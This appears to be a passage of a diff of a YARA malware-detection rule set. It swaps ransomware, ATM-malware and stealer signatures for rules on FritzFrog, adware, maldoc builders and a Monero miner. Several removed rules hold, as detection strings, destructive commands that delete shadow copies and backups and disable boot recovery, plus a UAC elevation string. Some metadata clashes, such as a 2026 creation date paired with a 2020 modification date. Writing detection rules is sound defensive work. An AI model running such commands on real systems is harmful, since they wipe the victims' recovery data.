00 66 d1 e8 66 83 e0 7f 66 89 05 2d 08 02 00 0f b7 05 28 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 1a 08 02 00 0f b7 05 15 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 07 08 02 00 0f b7 05 02 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 f4 07 02 00 0f b7 05 ef 07 02 00 66 d1 e8 66 83 e0 7f 66 89 05 e1 07 02 00 b8 01 00 00 00 66 0f 6e c8 8d 50 05 66 0f d1 c1 66 0f db c2 f3 0f 7f 05 c7 07 02 00 0f }
-		$s4 = { 48 89 9c 24 60 06 00 00 48 89 b4 24 68 06 00 00 48 89 bc 24 70 06 00 00 4c 89 b4 24 30 06 00 00 c7 05 2e 1a 02 00 04 00 00 00 48 c7 05 27 1a 02 00 01 00 00 00 4c 89 2d 2c 1a 02 00 ff 15 22 48 01 00 48 8d 35 8b 04 02 00 66 66 66 0f 1f 84 00 00 00 00 00 33 d2 44 89 6c 24 70 41 b8 08 03 00 00 48 8d 8d 10 02 00 00 45 8b f5 e8 e4 28 00 00 4c 8d 0d 5d 03 02 00 48 89 74 24 20 ba 84 01 00 00 48 8d 8d 10 02 00 00 49 c7 c0 ff ff ff ff e8 a0 fb ff ff 48 8d 54 24 70 48 8d 8d 10 02 00 00 e8 9f 05 00 00 8b d0 85 }
-		$s5 = { 4c 89 6c 24 60 4c 8d 05 25 cc 01 00 4c 89 6c 24 58 48 8d 15 e1 04 02 00 4c 89 6c 24 50 41 b9 ff 01 0f 00 4c 89 6c 24 48 48 8b cf 4c 89 6c 24 40 48 89 74 24 38 44 89 6c 24 30 c7 44 24 28 02 00 00 00 c7 44 24 20 10 00 00 00 ff 15 19 46 01 00 48 8b d8 ff 15 a8 46 01 00 8b f0 48 85 db 74 22 48 8b cb ff 15 20 46 01 00 48 8b cb ff 15 ff 45 01 00 48 8b cf ff 15 f6 45 01 00 bf 01 00 00 }
-		$s6 = { 33 d2 33 c9 41 b8 3f 00 0f 00 ff 15 f4 46 01 00 48 8b f8 48 85 }
+		$pattern_0 = { 6437 3e2585829c88 ec ec 1bc8 }
+		$pattern_1 = { d7 b9513e1ba7 195ab6 e6df 7e2a 5a b6cc }
+		$pattern_2 = { 80aee281aae280 8ee2 808ce2808ee2808e e280 ae 00436f 6e }
+		$pattern_3 = { 6d e586 4c 40 }
+		$pattern_4 = { e281 ab e280 8ee2 80aee281aae280 8ee2 }
+		$pattern_5 = { 6c 69636b65644576 656e 7441 7267 7300 }
+		$pattern_6 = { 6e 7e81 d86aaf 61 93 7c2b 832b62 }
+		$pattern_7 = { 8b1c87 e7ed 24a2 3218 73df 53 }
+		$pattern_8 = { ee 9a357f9a475399 3188eef97d50 3f ef c9 }
+		$pattern_9 = { 44 a2???????? 92 7526 42 208fb5ca7050 }
+		$pattern_10 = { f2bbafb0d5f8 d524 0d48c906ba 7977 5d }
+		$pattern_11 = { 748f 46 4e 49 2af2 ee 9a357f9a475399 }
+		$pattern_12 = { 237ddb e200 95 46 99 37 }
+		$pattern_13 = { d9ae1d19ec3b 01db c5615c ec }
+		$pattern_14 = { 304a8a e2f4 bde7a84f79 c038d3 197ceae6 }
+		$pattern_15 = { 291f ff84c3bd55d8dc f331f2 1a3a 9c 7d78 }
+		$pattern_16 = { 3f 7af1 77a2 24ae 7ff3 }
+		$pattern_17 = { d1655d 7236 3873c1 b59e }
+		$pattern_18 = { 2aff 95 55 28ff 94 53 }
+		$pattern_19 = { e6b1 43 08d2 ef 43 3c38 }
+		$pattern_20 = { 6964427275736800 43 6f 6c 6f 7200 e281 }
+		$pattern_21 = { 37 005400a7 877f08 54 00e1 875303 5c }
+		$pattern_22 = { 6a45 e42c d3ba76c4f058 ce 3037 }
+		$pattern_23 = { b59e 59 f1 f1 }
+		$pattern_24 = { 7988 cd09 91 0099664e0391 008288490061 008c88d3099900 }
+		$pattern_25 = { 1e e3c2 00ff 698876be8fb365b13eb7 45 }
+		$pattern_26 = { 3d4c9deadf 57 ddeb 97 }
+		$pattern_27 = { e280 8ee2 808ee281aee280 8ee2 81ace281ace280ade280ab e281 }
+		$pattern_28 = { 4d 9c 8e5753 32414f d28a7173e2c4 7ee4 d9ae1d19ec3b }
+		$pattern_29 = { 7472 69704d656e755f 53 61 }
+		$pattern_30 = { 79bc fa ad 49 }
+		$pattern_31 = { 875303 5c 00140a 37 005c00a7 }
+		$pattern_32 = { 7265 5f 43 6c 69636b00746f6f 6c 53 }
+		$pattern_33 = { 36e633 2b2b 3673d1 d480 124d2d }
+		$pattern_34 = { 19b3e7ab29db 51 e1f3 dd3a 266f b884c4b53b }
+		$pattern_35 = { 7467 43 f332d2 84bf3df2e66b 4a ba5a20d9f5 3dbf2a3753 }
+		$pattern_36 = { f271f3 8877f7 a8e5 6437 3e2585829c88 }
+		$pattern_37 = { ce 84604c 3f 8cc6 56 bf165fdec5 4a }
+		$pattern_38 = { ad 49 a2???????? 4c e15b 8b1c87 }
+		$pattern_39 = { 3400 b687 bc083c00cd 87ce 083400 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 80KB and 5 of ( $s* )
+		7 of them and filesize < 3834880
 }
-rule ARKBIRD_SOLG_Ran_Babuklockers_Jan_2021_1 : FILE
+rule TRELLIX_ARC_MALW_Fritzfrog : BOTNET FILE
 {
 	meta:
-		description = "Detect the BabukLocker ransomware"
-		author = "Arkbird_SOLG"
-		id = "a3bad41d-59fb-564f-a352-ca38af582c08"
-		date = "2020-01-03"
-		modified = "2021-01-03"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-01-02/BabukLocker/Ran_BabukLockers_Jan_2021_1.yar#L1-L23"
-		license_url = "N/A"
-		logic_hash = "8939e408948dd7b17acdac5c6b5f50db24ec63f19937b8663a15f52b678d0065"
-		score = 50
-		quality = 75
-		tags = "FILE"
-		hash1 = "8203c2f00ecd3ae960cb3247a7d7bfb35e55c38939607c85dbdb5c92f0495fa9"
-		level = "Experimental"
+		description = "Rule to detect Fritzfrog"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "4c553279-7e0c-5602-944d-ad8a47edf4ea"
+		date = "2020-08-20"
+		modified = "2020-08-20"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_fritzfrog.yar#L1-L26"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		logic_hash = "488c807ecf0a9e981b2c1f2f5bb2e3072952d11f7cbf3a354bc85dc8e88b8b09"
+		score = 75
+		quality = 70
+		tags = "BOTNET, FILE"
+		rule_version = "v1"
+		malware_type = "botnet"
+		malware_family = "Botnet:W32/Fritzfrog"
+		actor_type = "Cybercrime"
+		hash1 = "103b8404dc64c9a44511675981a09fd01395ee837452d114f1350c295357c046"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$seq1 = { 55 8b ec 83 ec 14 a1 b0 81 40 00 33 c5 89 45 fc c7 45 f8 ff ff ff ff c7 45 f4 00 40 00 00 8d 45 f0 50 8b 4d 08 51 6a 13 6a 00 6a 02 e8 85 2b 00 00 85 c0 0f 85 a3 00 00 00 8b 55 f4 52 e8 ae 06 00 00 83 c4 04 89 45 08 83 7d 08 00 0f 84 81 00 00 00 8d 45 f4 50 8b 4d 08 51 8d 55 f8 52 8b 45 f0 50 e8 55 2b 00 00 85 c0 75 5c c7 45 ec 00 00 00 00 eb 09 8b 4d ec 83 c1 01 89 4d ec 8b 55 ec 3b 55 f8 73 40 8b 45 ec c1 e0 05 8b 4d 08 8b 54 01 0c 83 e2 02 74 14 8b 45 ec c1 e0 05 03 45  }
-		$seq2 = { 68 68 22 40 00 b8 04 00 00 00 c1 e0 00 8b 8d 9c fd ff ff 8b 14 01 52 ff 15 b8 90 40 00 85 c0 75 0c c7 85 b0 fd ff ff 01 00 00 00 eb 58 68 74 22 40 00 b8 04 00 00 00 c1 e0 00 8b 8d 9c fd ff ff 8b 14 01 52 ff 15 b8 90 40 00 85 c0 75 0c c7 85 b0 fd ff ff 00 00 00 00 eb 2b 68 80 22 40 00 b8 04 00 00 00 c1 e0 00 8b 8d 9c fd ff ff 8b 14 01 52 ff 15 b8 90 40 00 85 c0 75 0a c7 85 b0 fd ff ff ff ff ff ff e9 55 ff ff ff 6a 00 6a 00 ff 15 a8 90 40 00 e8 aa 04 00 00 e8 05 }
-		$seq3 = { 83 c4 0c 68 f4 00 00 00 8d 85 f4 fd ff ff 50 68 88 22 40 00 ff 15 6c 90 40 00 68 98 22 40 00 8d 8d f4 fd ff ff 51 ff 15 c4 90 40 00 c7 85 ec fd ff ff 00 00 00 00 6a 00 68 80 00 00 00 6a 01 6a 00 6a 01 68 00 00 00 40 8d 95 f4 fd ff ff 52 ff 15 70 90 40 00 89 85 98 fd ff ff 83 bd 98 fd ff ff ff 0f 84 2e 03 00 00 6a 00 8d 85 ec fd ff ff 50 68 90 00 00 00 68 78 82 40 00 8b 8d 98 fd ff ff 51 ff 15 90 90 }
-		$s1 = "\\ecdh_pub_k.bin" fullword wide
-		$s2 = "ntuser.dat.log" fullword wide
-		$s3 = "cmd.exe" fullword ascii
-		$s4 = "/c vssadmin.exe delete shadows /all /quiet" fullword wide
-		$s5 = { 5c 00 5c 00 3f 00 5c 00 00 00 00 00 3a 00 00 00 98 2f }
+		$pattern = { 7F454C4602010100000000000000000002003E000100000090D34500000000004000000000000000C8010000000000000000000040003800070040000D000300060000000400000040000000000000004000400000000000400040000000000088010000000000008801000000000000001000000000000004000000040000009C0F0000000000009C0F4000000000009C0F400000000000640000000000000064000000000000000400000000000000010000000500000000000000000000000000400000000000000040000000000083F23E000000000083F23E00000000000010000000000000010000000400000000003F000000000000007F000000000000007F00000000006C834500000000006C834500000000000010000000000000010000000600000000908400000000000090C400000000000090C4000000000060EC0400000000005809070000000000001000000000000051E574640600000000000000000000000000000000000000000000000000000000000000000000000000000000000000080000000000000080150465002A000000000000000000000000000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000100000006000000000000000010400000000000001000000000000083E23E00000000000000000000000000100000000000000000000000000000004100000001000000020000000000000000007F000000000000003F0000000000C0271B0000000000000000000000000020000000000000000000000000000000720000000300000000000000000000000000000000000000C0275A00000000007C000000000000000000000000000000010000000000000000000000000000004900000001000000020000000000000040289A000000000040285A0000000000D83600000000000000000000000000002000000000000000000000000000000053000000010000000200000000000000185F9A0000000000185F5A0000000000380D0000000000000000000000000000080000000000000000000000000000005D000000010000000200000000000000506C9A0000000000506C5A0000000000000000000000000000000000000000000100000000000000000000000000000067000000010000000200000000000000606C9A0000000000606C5A00000000000C172A0000000000000000000000000020000000000000000000000000000000070000000100000003000000000000000090C400000000000090840000000000004B0300000000000000000000000000200000000000000000000000000000001200000001000000030000000000000000DBC7000000000000DB87000000000050A101000000000000000000000000002000000000000000000000000000000018000000080000000300000000000000607CC90000000000607C890000000000D0E80100000000000000000000000000200000000000000000000000000000001D0000000800000003000000000000004065CB000000000040658B00000000001834000000000000000000000000000020000000000000000000000000000000270000000700000002000000000000009C0F4000000000009C0F00000000000064000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 15KB and 2 of ( $seq* ) and 3 of ( $s* )
+		uint16( 0 ) == 0x457f and filesize < 26000KB and all of them
 }
-
-rule ARKBIRD_SOLG_Mal_ATM_Loup_Aug_2020_1 : FILE
+rule TRELLIX_ARC_Malw_Browser_Fox_Adware : ADWARE FILE
 {
 	meta:
-		description = "Detect ATM malware Loup by theirs strings."
-		author = "Arkbird_SOLG"
-		id = "07c0fe02-a82a-58a7-8776-748a1c986f93"
-		date = "2020-08-17"
-		modified = "2020-08-18"
-		reference = "https://twitter.com/r3c0nst/status/1295275546780327936"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-17/Loup/Mal_ATM_Loup_Aug_2020_1.yar#L3-L34"
-		license_url = "N/A"
-		logic_hash = "18e4d6af5d89746b42c87d7311e442f61deff3bfcbf57cc008d87290e91baafb"
+		description = "Rule to detect Browser Fox Adware based on the PDB reference"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "67d20c3a-4e9d-5fbf-b26a-d7b5fb270d12"
+		date = "2015-01-15"
+		modified = "2020-08-14"
+		reference = "https://www.sophos.com/en-us/threat-center/threat-analyses/adware-and-puas/Browse%20Fox.aspx"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_browser_fox_adware.yar#L1-L25"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		hash = "c6f3d6024339940896dd18f32064c0773d51f0261ecbee8b0534fdd9a149ac64"
+		logic_hash = "462a05de46ec0d710cac80a05d4935279a43f49cbd5ef49c072f277982a76fce"
 		score = 75
-		quality = 67
-		tags = "FILE"
-		hash1 = "6c9e9f78963ab3e7acb43826906af22571250dc025f9e7116e0201b805dc1196"
+		quality = 70
+		tags = "ADWARE, FILE"
+		rule_version = "v1"
+		malware_type = "adware"
+		malware_family = "Adware:W32/BrowserFox"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$pdb1 = "C:\\Users\\muham\\source\\repos\\loup\\Debug\\loup.pdb" fullword ascii
-		$pdb2 = "PDBOpenValidate5" fullword ascii
-		$dbg1 = "Run-Time Check Failure #%d - %s" fullword ascii
-		$dbg2 = "Unknown Filename" fullword ascii
-		$dbg3 = "Unknown Module Name" fullword ascii
-		$info1 = "%s%s%p%s%zd%s%d%s%s%s%s%s" fullword ascii
-		$info2 = { 41 64 64 72 65 73 73 3a 20 30 78 }
-		$info3 = { 53 69 7a 65 3a }
-		$info4 = { 44 61 74 61 3a }
-		$s1 = "MSXFS.dll" fullword ascii
-		$s2 = "WFSExecute" fullword ascii
-		$s3 = "WfsVersion" fullword ascii
-		$s4 = "SvcVersion" fullword ascii
-		$s5 = "SpiVersion" fullword ascii
-		$s6 = "CurrencyDispenser1" fullword ascii
-		$s7 = "WFSUnlock" fullword ascii
-		$s8 = "WFSFreeResult" fullword ascii
-		$s9 = "WFSCleanUp" fullword ascii
-		$s10 = "WFSOpen" fullword ascii
-		$s11 = "WFSClose" fullword ascii
-		$s12 = "WFSStartUp" fullword ascii
+		$pdb = "\\Utilities\\130ijkfv.o4g\\Desktop\\Desktop.OptChecker\\bin\\Release\\ BooZaka.Opt"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20KB and ( pe.imphash ( ) == "190fc01f66c40478aa91be89a98c57e9" and ( 1 of ( $pdb* ) and 2 of ( $dbg* ) and 2 of ( $info* ) and 9 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and any of them
 }
-rule ARKBIRD_SOLG_RAN_Medusalocker_July_2021_1 : FILE
+rule TRELLIX_ARC_Msworldexploit_Builder_Doc : MALDOC FILE
 {
 	meta:
-		description = "Detect MedusaLocker ransomware"
-		author = "Arkbird_SOLG"
-		id = "7eec35ac-f1ec-596b-8224-ef27e31e841c"
-		date = "2021-07-25"
-		modified = "2021-08-08"
-		reference = "https://twitter.com/r3dbU7z/status/1418433910057353217"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-25/MedusaLocker/RAN_MedusaLocker_July_2021_1.yara#L1-L28"
-		license_url = "N/A"
-		logic_hash = "541665541c07b585a7dfa024f85516b7be94d7d8d76a85e58c8c3b71fd0550ff"
+		description = "Rule to detect RTF/Docs files created by MsWordExploit Builder"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "6c4c091b-5fce-583a-bc17-31830251892c"
+		date = "2026-03-01"
+		modified = "2020-08-14"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_MsWordExploit_DOC.yar#L1-L24"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		logic_hash = "f85c6d79e5ed20084d35f9de92a9d9ce20cf4b3100b1226d64147e366934585d"
 		score = 75
-		quality = 73
-		tags = "FILE"
-		hash1 = "033b4950a8f249b20eb86ec6f8f2ea0a1567bb164289d1aa7fb0ba51f9bbe46c"
-		hash2 = "0abb4a302819cdca6c9f56893ca2b52856b55a0aa68a3cb8bdcd55dcc1fad9ad"
-		hash3 = "c2a0a317d73c96428ab088a8f0636ec4ccace7ca691c84ed66a83a70183f40dc"
-		hash4 = "f5fb7fa5231c18f0951c755c4cb0ec07b0889b5e320f42213cbf6bbbe499ad31"
-		tlp = "white"
-		adversary = "RaaS"
+		quality = 68
+		tags = "MALDOC, FILE"
+		malware_type = "maldoc"
+		malware_family = "Maldoc:W32/MSwordExploit"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$s1 = { 76 00 73 00 73 00 61 00 64 00 6d 00 69 00 6e 00 2e 00 65 00 78 00 65 00 20 00 52 00 65 00 73 00 69 00 7a 00 65 00 20 00 53 00 68 00 61 00 64 00 6f 00 77 00 53 00 74 00 6f 00 72 00 61 00 67 00 65 00 20 00 2f 00 66 00 6f 00 72 00 3d 00 ?? 00 3a 00 20 00 2f 00 6f 00 6e 00 3d 00 ?? 00 3a 00 20 00 2f 00 6d 00 61 00 78 00 73 00 69 00 7a 00 65 00 3d }
-		$s2 = { 64 00 65 00 6c 00 20 00 2f 00 73 00 20 00 2f 00 66 00 20 00 2f 00 71 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 56 00 48 00 44 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 62 00 61 00 63 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 62 00 61 00 6b 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 77 00 62 00 63 00 61 00 74 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 62 00 6b 00 66 00 20 00 ?? 00 3a 00 5c 00 42 00 61 00 63 00 6b 00 75 00 70 00 2a 00 2e 00 2a 00 20 00 ?? 00 3a 00 5c 00 62 00 61 00 63 00 6b 00 75 00 70 00 2a 00 2e 00 2a 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 73 00 65 00 74 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 77 00 69 00 6e 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 64 00 73 00 6b }
-		$s3 = { 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2e 00 65 00 78 00 65 00 20 00 2f 00 73 00 65 00 74 00 20 00 7b 00 64 00 65 00 66 00 61 00 75 00 6c 00 74 00 7d 00 20 00 62 00 6f 00 6f 00 74 00 73 00 74 00 61 00 74 00 75 00 73 00 70 00 6f 00 6c 00 69 00 63 00 79 00 20 00 69 00 67 00 6e 00 6f 00 72 00 65 00 61 00 6c 00 6c 00 66 00 61 00 69 00 6c 00 75 00 72 00 65 00 73 }
-		$s4 = { 42 67 49 41 41 41 43 6b 41 41 42 53 55 30 45 78 }
-		$s5 = "wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest" fullword wide
-		$s6 = { 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2e 00 65 00 78 00 65 00 20 00 2f 00 73 00 65 00 74 00 20 00 7b 00 64 00 65 00 66 00 61 00 75 00 6c 00 74 00 7d 00 20 00 72 00 65 00 63 00 6f 00 76 00 65 00 72 00 79 00 65 00 6e 00 61 00 62 00 6c 00 65 00 64 00 20 00 4e 00 6f }
-		$s7 = { 76 00 73 00 73 00 61 00 64 00 6d 00 69 00 6e 00 2e 00 65 00 78 00 65 00 20 00 44 00 65 00 6c 00 65 00 74 00 65 00 20 00 53 00 68 00 61 00 64 00 6f 00 77 00 73 00 20 00 2f 00 41 00 6c 00 6c 00 20 00 2f 00 51 00 75 00 69 00 65 00 74 }
-		$s8 = { 77 00 6d 00 69 00 63 00 2e 00 65 00 78 00 65 00 20 00 53 00 48 00 41 00 44 00 4f 00 57 00 43 00 4f 00 50 00 59 00 20 00 2f 00 6e 00 6f 00 69 00 6e 00 74 00 65 00 72 00 61 00 63 00 74 00 69 00 76 00 65 }
-		$s9 = { 77 00 62 00 61 00 64 00 6d 00 69 00 6e 00 20 00 44 00 45 00 4c 00 45 00 54 00 45 00 20 00 53 00 59 00 53 00 54 00 45 00 4d 00 53 00 54 00 41 00 54 00 45 00 42 00 41 00 43 00 4b 00 55 00 50 }
-		$s10 = { 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 20 4c 49 53 54 20 4f 46 20 45 4e 43 52 59 50 54 45 44 20 46 49 4c 45 53 20 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 0d 0a }
-		$x1 = { 48 89 5c 24 08 57 48 83 ec 30 48 8b da 48 8b f9 e8 0b fe ff ff 44 8b 43 08 48 8d 47 28 44 2b 03 45 33 c9 48 8b 13 48 8b 4f 20 48 89 44 24 28 c7 44 24 20 00 00 00 00 ff 15 [2] 07 00 85 c0 74 12 c6 47 08 01 48 8b c7 48 8b 5c 24 40 48 83 c4 30 5f c3 ff 15 [2] 07 00 48 8b 5c 24 40 89 47 34 48 8b c7 }
+		$s1 = { 68 74 74 70 3A 2F 2F 61 70 69 2E 6D 73 77 6F 72 64 65 78 70 6C 6F 69 74 2E 63 6F 6D }
+		$s2 = "{\\*\\generator mswordexploit 6.3.9600}" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 150KB and 9 of ( $s* ) and $x1
+		uint16( 0 ) == 0x3030 and filesize < 4000KB and any of them
 }
-rule ARKBIRD_SOLG_MAL_Cadelspy_Stealer_May_2021_1 : FILE
+rule TRELLIX_ARC_MINER_Monero_Mining_Detection : MINER FILE
 {
 	meta:
-		description = "Detect Cadelspy stealer"
-		author = "Arkbird_SOLG"
-		id = "bac23ed9-f51c-546e-8f4e-320d33b51829"
-		date = "2021-05-30"
-		modified = "2021-06-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-30/APT39/MAL_Cadelspy_Stealer_May_2021_1.yara#L1-L24"
-		license_url = "N/A"
-		logic_hash = "29fade3703c55bd16e67f9bf126cb0d8a06bc0eafe10e145f8d57d8c4abe5656"
+		description = "Monero mining software"
+		author = "Trellix ATR team"
+		id = "98ee7711-16ee-58e1-b52f-c68dd5f2b8a3"
+		date = "2018-04-05"
+		modified = "2022-01-19"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/miners/MINER_Monero.yar#L1-L43"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		logic_hash = "4c1815186b0eb9e6be5fb0fcad02fd981ac9cf79c485fe12ce4a73054ef9fda2"
 		score = 75
-		quality = 75
-		tags = "FILE"
-		hash1 = "8847a73bbd9477be60685ce8ec8333db933892f4d7b729fcef01ac76600de9ff"
-		hash2 = "f3b0ad96c8529399bd7117bd67cdf0297191476d3a81a60b147960306ae5f068"
-		hash3 = "88c947d0d0fddd1ea87f5b85982cf231c9c56e4f5e25fac405f608a1c28d8391"
-		tlp = "White"
-		adversary = "APT39"
+		quality = 70
+		tags = "MINER, FILE"
+		rule_version = "v1"
+		malware_type = "miner"
+		malware_family = "Ransom:W32/MoneroMiner"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$str1 = "C:\\Windows\\SysEvent.exe" fullword wide
-		$str2 = "\\sysprep\\sysprep.exe" fullword wide
-		$str3 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" fullword wide
-		$str4 = "@C:\\Windows\\systemw.dll" fullword wide
-		$str5 = "systemw.dll" fullword ascii
-		$str6 = "ApAshell32.dll" fullword wide
-		$seq1 = { 55 8b ec 83 ec 14 a1 04 00 41 00 33 c5 89 45 fc 8d 45 f8 c7 45 f0 00 00 00 00 50 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 68 20 02 00 00 6a 20 6a 02 8d 45 f0 66 c7 45 f4 00 05 50 ff 15 08 30 40 00 85 c0 74 25 8d 45 ec 50 ff 75 f8 6a 00 ff 15 04 30 40 00 ff 75 f8 f7 d8 1b c0 21 45 ec ff 15 00 30 40 00 83 7d ec 00 75 05 e8 52 fd ff ff 56 68 2d 02 00 00 ff 15 30 30 40 00 68 1c 33 40 00 ff 15 20 30 40 00 6a 00 6a 00 6a 01 6a 00 6a 00 6a 02 68 1c 33 40 00 89 45 f8 ff 15 1c 30 40 00 6a 00 8b f0 8d 45 f8 50 68 00 ba 00 00 68 68 33 40 00 56 ff 15 6c 30 40 00 56 ff 15 74 30 40 00 6a 01 6a 00 6a 00 68 1c 33 40 00 68 4c 33 40 00 6a 00 ff 15 b0 30 40 00 8b 4d fc 33 c0 33 cd 5e e8 06 00 00 00 }
